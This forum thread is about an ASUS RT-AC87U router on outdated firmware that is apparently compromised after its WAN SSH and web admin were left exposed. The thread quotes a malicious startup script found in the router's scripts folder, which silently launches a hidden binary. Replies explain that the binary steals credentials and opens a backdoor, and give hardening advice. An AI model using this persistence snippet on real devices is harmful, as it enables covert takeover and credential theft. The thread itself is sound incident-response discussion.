[HACKED?] SSH not working all of a sudden (and strange log lines) - RTAC87U

[elbubi]

Hi to everyone! Long time no post here, but I still come here oftenly to be updated and continue learning.

I'm still using my beloved RT-AC87U under Merlin's v384.13_10 (bridge mode attached to a fiber GPON).
All was working flawlessly for the last several months/years.

Now, all of a sudden, I can't access SSH anymore using Putty or WinSCP (Network Error: Connection Refused)
Another strange behaviour is that DownloadMaster not responding (connection refused also), and can't even uninstall it.
JFFS scritpts are working just fine (ARP static entries, OC, ect), but I can't access SSH no matter what I do.
I want to avoid a full reset at all costs so I really need your help to find a workaround

Also, I'm getting this line at log every single second: "kernel: br0: received packet on vlan4000 with own address as source address"
Don't know if its related or not but I dont recall seen it anytime before this SSH issue, and does not seem to be a healthy situation.

What I've modified under web ui in the last few weeks (but didn break SSH since I used it after all of them):

1) Activate 5Ghz Guest WiFI (was using only 2.4Ghz not to saturate Quantenna but mouse interference was driving me nuts)
2) Activate IPv6 (just for the sake of it)
3) Add new DHCP fix entry (replacement for recently stolen phone)

What I've tried (after searching the issue) to solve the it and didn't work:

1) Disable all guests Wi-Fi's (2.4 + 5)
2) Disable IPv6 (vlan 4000 seems to be related to ipv6 under my non knowledgeable eyes)
3) Double check no duplicated ip's nor mac's under dhcp reservations (to discard a network loop)
4) Enable/Disable SSH Access, change port, change LAN/WAN/LAN+WAN option.
5) Several restarts, power offs, power drains.

As I can't enter SSH, I'm kind of blind, but here I paste some log entries and routing tables:

Spoiler: System Log

Spoiler: IPv4 Routing Table

Spoiler: IPv6 Routing Table

Hoping some of your enlightment could help me solve this issue without performing a reset.
Glad to share any more info or full logs in case are needed.

Regards and thanks in advance!!!

 

[elbubi]

Hi to all.
I've discovered the root of my issues, and I'm guessing it might be a hack.
I've found a file named "openvpn.event" on my scritps folder with the following content:

#!/bin/sh
echo '#!/bin/sh
sleep 40
chmod 777 /jffs/cfgicon/cfg_silent
/jffs/cfgicon/cfg_silent > /dev/null 2>&1 &' | sh &

I've attached de cfg_silent file it points to, but I can't understand whats its content mean.
I've deleted those 2 files and everything went back to normal.
Those two unwanted files are dated just 7 days after my phone got stolen on the street (had some Termius sessions where my static ip/ddns was saved, not the password itself)
Phone had fingerprint lock though, but its pretty coincidental the close dates on the two events.

Have I've been hacked to somehow hijack all my traffic? What do you think?

PS: I've already closed all remote SSH access and changed all router passwords.

 

[ColinTaylor]

Well spotted. Definitely malware of some sort. At first glance it appears to collect various information from and about your router, including logon name, passwords, and DDNS name and send them to a Dutch server. Also looks like it's opening a backdoor port into your router for remote access.

 

[elbubi]

Thanks for the reply Colin.

I'm really worried how the heck they broke in, and how far the data steel went.

 

[jtp10181]

I'm really worried how the heck they broke in, and how far the data steel went.

Did you have "Enable Web Access from WAN" Enabled?

 

[elbubi]

Did you have "Enable Web Access from WAN" Enabled?

Sadly (and noobly) yes, both web access and ssh access were enabled from WAN.

 

[sfx2000]

I'm still using my beloved RT-AC87U under Merlin's v384.13_10 (bridge mode attached to a fiber GPON).
All was working flawlessly for the last several months/years.

Might be time to consider replacing the AC87U - it's well past it's use-by date, and as such, will be an ongoing security risk with no upgrades...

 

[ColinTaylor]

Sadly (and noobly) yes, both web access and ssh access were enabled from WAN.

That's probably it then. Since the final update for the 87U there have been multiple critical security updates for the other models which the 87U has missed out on.

 

[elbubi]

Might be time to consider replacing the AC87U - it's well past it's use-by date, and as such, will be an ongoing security risk with no upgrades...

That's probably it then. Since the final update for the 87U there have been multiple critical security updates for the other models which the 87U has missed out on.

I know, I know, and it hurts .
Here in my country (Argentina) these things costs twice or triple than abroad (and we earn much less), but my mother in law is traveling to the states next month, I will try to get an AX86U (¿pro?) on Amazon and finally put my beloved 87U to rest.

 

[sfx2000]

I know, I know, and it hurts .
Here in my country (Argentina) these things costs twice or triple than abroad (and we earn much less), but my mother in law is traveling to the states next month, I will try to get an AX86U (¿pro?) on Amazon and finally put my beloved 87U to rest.

Understood - that being said, as long as you don't expose services out to the WAN that should be ok in the short term...

With this older HW, you're missing out on quite a bit of functionality that has been updated over the years...

 

[jtp10181]

Agreed, turn of the WAN admin and SHH access. If you really need remote access setup OpenVPN on the router which should be much more secure. Unless there were some critical security patches for that also, but it should be the least risky at least.

 

[elbubi]

Understood - that being said, as long as you don't expose services out to the WAN that should be ok in the short term...

With this older HW, you're missing out on quite a bit of functionality that has been updated over the years...

Agreed, turn of the WAN admin and SHH access. If you really need remote access setup OpenVPN on the router which should be much more secure. Unless there were some critical security patches for that also, but it should be the least risky at least.

Thanks for the tip guys, I will hold on locked to LAN only access until I can replace it for a newer device.
I knew WAN access was a bit risky, but I did not think this (outdated) device would be SO vulnerable. Lesson learned (the hard way though...)

Regards and thanks once again for your input.

 

[Jaime Alvarez]

Thanks for the tip guys, I will hold on locked to LAN only access until I can replace it for a newer device.
I knew WAN access was a bit risky, but I did not think this (outdated) device would be SO vulnerable. Lesson learned (the hard way though...)

Regards and thanks once again for your input.

Even with a new device, do use OpenVPN to ssh to your router from outside. Plain WAN access is way riskier.

 

[elbubi]

Agreed, turn of the WAN admin and SHH access. If you really need remote access setup OpenVPN on the router which should be much more secure. Unless there were some critical security patches for that also, but it should be the least risky at least.

Even with a new device, do use OpenVPN to ssh to your router from outside. Plain WAN access is way riskier.

Thanks once again to all for your help.

I will read and learn how to set up an OpenVPN connection for remote access then.
One preliminary question about it: Do I have to route all my traffic through that VPN or is it just for remote access?

I am thinking now that even if I disabled both web admin and ssh access from WAN, AiCloud is still enabled.
I guess that service obviously means an exposure risk also, so I will shut it down as soon as I get home.

Kind Regards.

 

[ColinTaylor]

One preliminary question about it: Do I have to route all my traffic through that VPN or is it just for remote access?

The router's VPN server is just for remote access as and when you need it.

I am thinking now that even if I disabled both web admin and ssh access from WAN, AiCloud is still enabled.
I guess that service obviously means an exposure risk also, so I will shut it down as soon as I get home.

Yes this just as much of a security risk.

 

[elbubi]

Thanks again!

 

[netware5]

Rule No.1: The only router port opened to the external world shall be the port OpenVPN server listening to! Following this rule also allows to minimise the risk using older router, which does not receive security updates anymore. The OpenVPN is very robust from the security point of view.

 

[elbubi]

Just wanted to thank you all once again guys, I've already set up an OpenVPN server on router side and clients both on my laptop and my phone (and stored .ovpn file securely on the cloud just in case)

God it was SO MUCH EASIER than I tought! I got confused from the very beginning with the concept of paid private services such as NordVPN, ExpressVPN, etc., that is why I dismissed it from the get go every time I read about it.

Thanks for helping me to learn!!!